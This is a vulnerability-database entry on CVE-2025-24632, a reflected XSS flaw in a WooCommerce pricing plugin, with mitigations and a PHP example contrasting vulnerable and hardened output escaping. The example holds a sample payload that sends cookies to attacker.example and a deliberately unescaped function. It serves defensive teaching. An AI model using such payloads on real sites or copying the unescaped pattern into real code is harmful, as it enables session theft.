CVE-2025-24632
Published: 31 January 2025
Summary
CVE-2025-24632 is a high-severity Cross-site Scripting (CWE-79) vulnerability. Its CVSS base score is 7.1 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Content Injection (T1659). The CVE ranks at the 35.4th percentile by exploit likelihood (below the median), and it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2025-24632 is an Improper Neutralization of Input During Web Page Generation vulnerability (CWE-79) that enables Reflected Cross-site Scripting (XSS). It affects the Advanced Dynamic Pricing for WooCommerce WordPress plugin by algol.plus in all versions up to and including 4.9.0. The vulnerability carries a CVSS v3.1 base score of 7.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L). The individual confidentiality, integrity and availability impacts are each rated Low; the High rating comes from network reachability combined with the scope change (S:C), because the injected script runs in the victim's browser rather than in the plugin's own security context.
An attacker can exploit the flaw remotely with low complexity and without any privileges on the site, but exploitation requires user interaction: the victim must open a crafted link or page whose request parameter the plugin reflects unescaped into the response. The injected script then runs in the victim's browser under the site's origin, enabling theft of session cookies, keystroke logging and other client-side attacks. Because the vulnerability is reflected rather than stored, nothing is persisted on the server and each victim must be lured separately; an administrator who follows such a link exposes their authenticated WordPress session.
The Patchstack advisory (https://patchstack.com/database/Wordpress/Plugin/advanced-dynamic-pricing-for-woocommerce/vulnerability/wordpress-advanced-dynamic-pricing-for-woocommerce-plugin-4-9-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve) documents the Reflected XSS issue in Advanced Dynamic Pricing for WooCommerce version 4.9.0 and provides vulnerability details for WordPress site administrators.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-3833
Vulnerability details
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in algol.plus Advanced Dynamic Pricing for WooCommerce (advanced-dynamic-pricing-for-woocommerce) allows Reflected XSS. This issue affects Advanced Dynamic Pricing for WooCommerce: from n/a through <= 4.9.0.
- CWE(s): CWE-79 (Improper Neutralization of Input During Web Page Generation)
Related Threats
MITRE ATT&CK Enterprise Techniques
- T1659 Content Injection
- T1185 Browser Session Hijacking
- T1539 Steal Web Session Cookie
- T1056.001 Input Capture: Keylogging
Why these techniques?
Reflected XSS directly enables content injection (T1659) through script execution in the victim's browser; that script can in turn hijack the browser session (T1185), steal web session cookies (T1539) and capture keystrokes (T1056.001), the impacts described for this CVE.
Affected Assets
- Advanced Dynamic Pricing for WooCommerce (algol.plus) WordPress plugin, versions <= 4.9.0
Mitigating Controls (NIST 800-53 r5)
SI-15 (Information Output Filtering) addresses reflected XSS at the point where it becomes exploitable: data that originated in the request must be escaped for the context in which the page emits it (HTML text, attribute, URL), so a reflected value can never be parsed as markup or script.
SI-10 (Information Input Validation) rejects or normalises untrusted request parameters before the plugin uses them, for example by allow-listing expected values and coercing numeric fields to integers, which removes most XSS payloads before they reach page generation.
SI-2 (Flaw Remediation) requires timely patching: update Advanced Dynamic Pricing for WooCommerce to a release later than 4.9.0, and confirm the installed version on each site from the Plugins screen or with WP-CLI's wp plugin list, since a reflected XSS cannot be mitigated by cleaning stored data.
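As an added illustration, not code from the plugin, from algol.plus or from the Patchstack advisory, the PHP below shows the reflected-XSS pattern that SI-10 and SI-15 address in a WordPress settings screen: a request parameter echoed straight into markup, beside a hardened version that allow-lists the value on input and escapes it for the exact output context. The page slug, parameter names, tab names and attack payload are invented; the function stand-ins at the top exist only so the file runs with plain php outside WordPress, where the real esc_html(), esc_attr(), sanitize_text_field(), wp_unslash() and absint() are already defined.

```php
<?php
// Hypothetical reflected-XSS pattern in a WordPress plugin admin page and its
// hardened form. Page slug, parameter names and payload are invented for
// illustration; this is not the code of Advanced Dynamic Pricing for WooCommerce.

// Stand-ins so the script runs with `php` outside WordPress. Inside WordPress
// these are skipped and the real core functions are used.
if (!function_exists('esc_html')) {
    function esc_html($text) { return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); }
}
if (!function_exists('esc_attr')) {
    function esc_attr($text) { return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); }
}
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field($str) { return trim(strip_tags((string) $str)); }
}
if (!function_exists('wp_unslash')) {
    function wp_unslash($value) { return stripslashes((string) $value); }
}
if (!function_exists('absint')) {
    function absint($v) { return abs((int) $v); }
}

// BEFORE: the request parameter lands in an attribute and in a text node with
// no validation and no escaping. A payload beginning with "> closes the
// attribute and the tag, and the <script> that follows runs in the victim's browser.
function render_tab_vulnerable(array $get): string {
    $tab = $get['tab'] ?? 'rules';
    return '<a class="nav-tab" href="?page=pricing&tab=' . $tab . '">' . $tab . '</a>';
}

// AFTER (SI-10 + SI-15): unslash and sanitise the raw value, validate it against
// an allow-list, then escape it for each output context. Unknown values fall back
// to a safe default instead of being reflected at all.
function render_tab_hardened(array $get): string {
    $allowed = ['rules', 'settings', 'log'];
    $tab = sanitize_text_field(wp_unslash($get['tab'] ?? 'rules'));
    if (!in_array($tab, $allowed, true)) {
        $tab = 'rules';
    }
    // Escape even the allow-listed value: defence in depth if the list later grows.
    return '<a class="nav-tab" href="?page=pricing&tab=' . esc_attr($tab) . '">' . esc_html($tab) . '</a>';
}

// Numeric parameters are coerced to an integer rather than having characters
// stripped; absint() turns "7 onmouseover=alert(1)" into 7.
function render_rule_id_hardened(array $get): string {
    $id = absint($get['rule_id'] ?? 0);
    return '<span class="rule-id">' . esc_html((string) $id) . '</span>';
}

// Constructed request, the kind of parameters a crafted link would carry.
$attack = [
    'tab'     => '"><script>document.location="https://attacker.example/?c="+document.cookie</script>',
    'rule_id' => '7 onmouseover=alert(1)',
];

echo "vulnerable: " . render_tab_vulnerable($attack) . PHP_EOL;
echo "hardened:   " . render_tab_hardened($attack) . PHP_EOL;
echo "rule id:    " . render_rule_id_hardened($attack) . PHP_EOL;
```

Run with php on the file: the vulnerable line emits the script tag intact, the hardened line emits the fallback "rules" tab with the payload gone, and the rule id collapses to 7. The two steps generalise to any reflected parameter: reject or coerce on the way in, and escape for the exact context on the way out (esc_attr for attribute values, esc_html for text nodes, esc_url for href values). Validation alone is not enough, because an allow-list that is later widened reintroduces the bug unless the output is still escaped.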